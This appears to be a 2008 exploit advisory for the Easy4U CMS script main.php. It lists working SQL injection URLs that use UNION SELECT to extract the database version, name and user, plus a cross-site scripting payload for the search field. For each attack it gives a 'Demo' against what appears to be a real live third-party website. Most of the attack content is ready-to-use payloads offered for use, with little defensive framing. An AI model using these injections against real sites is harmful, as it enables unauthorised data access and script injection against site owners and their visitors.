[~]-----------------------------------------------------------------------
[~] Easy4U CMS [main.php] - Multiple Remote Vulnerabilities
[~]
[~] http://www.ekkelenkamp.nl/Content_Management-pages-id-17.htm
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 29.09.2008
[~]
[~]
[~] d3v1l@spoofer.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig       AND      milw0rm staff
[~]-------------------------------------------------------------
[~] Exploit :- SQL Injection
[~]
[~] http://site.com/main.php?pag=pages&id=1' UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
[~] http://site.com/main.php?pag=pages&id=1' UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
[~]
[~] [on some site works only using LIMIT 1,1]
[~]
[~] Demo :-
[~]
[~] http://charcot-ms.eu/main.php?pag=pages&id=1' UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1/*
[~]
[~]-------------------------------------------------------------------------------------------------------------------------------------
[~]
[~] Exploit :- XSS (cross site scripting)
[~]
[~] http://site.com/main.php?pag=search     "><script>alert("1337")</script>
[~]
[~]
[~] Demo :-
[~]
[~] http://charcot-ms.eu/main.php?pag=search -> try to put in search box something like -> "><script>alert("1337")</script>  
[~]--------------------------------------------------------------------------------------------------------------------------------------